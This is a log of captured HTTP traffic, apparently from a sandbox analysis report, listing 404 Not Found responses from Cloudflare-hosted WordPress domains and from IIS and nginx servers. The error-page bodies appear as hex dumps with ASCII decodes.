Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:50:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HRVNe6t4Qu6vdEtL9iwI%2BQ1Q38bvr0S%2Bv7SeBZB9zTXz4KJzwfFHZND8kpGfk0doOnoX1lA1F5sAk9S79muVGFJPatHNbuURxpyCaJLrFeoZIKNHo3JcN462fT2Ntw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e10200b0f551a28-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2123&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=1326614&cwnd=230&unsent_bytes=0&cid=7d3700a79224c917&ts=888&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:50:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="39.3",amp_style_sanitizer;dur="18.5",amp_tag_and_attribute_sanitizer;dur="16.7",amp_optimizer;dur="21.6"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BvAc3iPRlLdr3uhZ2%2B1cfZPRivLkQeAxlEmKxJWFQmmy7W987mmoH8zUQTxvPcbYa1OeumM058V%2FYP77tcjNj%2Bq1dE%2FDyp8%2FCdgu1fuOZGTpa4mW0LqTZYgfRHLLXw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e10201c79c5c470-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1080&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=881&delivery_rate=2592658&cwnd=251&unsent_bytes=0&cid=edb2ecceb2d1bc0a&ts=1388&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:50:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="45.8",amp_style_sanitizer;dur="18.6",amp_tag_and_attribute_sanitizer;dur="21.3",amp_optimizer;dur="19.7"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BKoFbtd2QxUv1zO9bYiKeRCTkKH2L7p3ZhRGl0rXNi%2FQ%2FXulD5iSPj5r%2Bj2Z0%2BKk%2FI3bw%2FHUeuyaiPjCVTKAg3Z7RksY4lz8CPZZOR1rHqdd4Utbu%2FR1h5SbEZHvEw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e102029ddc80f7d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1265&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=881&delivery_rate=2260733&cwnd=251&unsent_bytes=0&cid=b9c91602b0989451&ts=1592&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:50:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VDqhFSckBbMMdt1%2Bi4C%2FqqQT7kNz4hBElXo2xCReegjuNyLnNPmKUuEkivTFKU5ay7HyVs6snzcpqD4EcqTCe9278BHYCA04YUV%2FG71W4PY%2BNij7YhvNA8hF0dFFcw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e10207558b76ac9-BOSalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=6915&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=881&delivery_rate=415197&cwnd=32&unsent_bytes=0&cid=a4bbf1a6f1330493&ts=834&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:50:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MYr8LF0YWpKwE%2FeGgprbyoxD3mDw%2FFuiiBCLXrs092U9A%2FGelKYQNWQBm0fQkPz8ck1%2B7o7Qg2%2BuzcuNa5NagmuRU9DeRnWQQ8ACGqyOCyIUvfMyaOhi49TP%2BtD1Fw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e10207ffc1f0cc2-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1284&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2028011&cwnd=249&unsent_bytes=0&cid=942c420829deedf4&ts=853&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:50:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="90.8",amp_style_sanitizer;dur="32.6",amp_tag_and_attribute_sanitizer;dur="39.0",amp_optimizer;dur="47.5"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i8ultcjbx3qKLlX7JzQcZTiaAgUQn5JYgMW%2BlgO7FvjBtam1P5Gk%2BIlqhzhKPDxHZt%2BRbr0fATGL8vwxCpQpVq0zfeHcoYyL%2FzU6JxaeaMc8RVBHr8BeIQXdnu3iSA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e10208e7937ac0f-YYZalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=11900&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=242993&cwnd=38&unsent_bytes=0&cid=0d3acfbefe145dc7&ts=1588&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:50:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="109.1",amp_style_sanitizer;dur="45.7",amp_tag_and_attribute_sanitizer;dur="32.8",amp_optimizer;dur="56.7"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X3H2%2FQjfCttD5TNIeL0%2Bepi4c4dg%2BVPfIBejVpsSiDzkqwtjQfEUEPO%2BRz%2F07iF7taOeeQ%2FIwk9ed3Qi53DT1HiVaxHoLlcZ%2F8WmvUTOWf%2F6MDci8ij%2FhFftfQx4%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e10209e4e4e0c7a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1167&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=2177443&cwnd=251&unsent_bytes=0&cid=824806930f275890&ts=2431&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:51:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2BjkOH46Ad7pds8uH%2FYqKlYGA9iz3%2FTkRCsONZ6WSREcNM%2FpFMR1K0UJv8DH9lJ4mRuEBEbLQZBczqOo3%2BrB7SHivU3MjxTKmTnPeJSZk2PjevX%2FL0T0Sh8%2BgQFqfQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1020f139fe5e82-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1399&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2019525&cwnd=250&unsent_bytes=0&cid=0dba1a167853490a&ts=1011&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:50:23 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:50:29 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:50:23 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:50:29 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:50:30 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
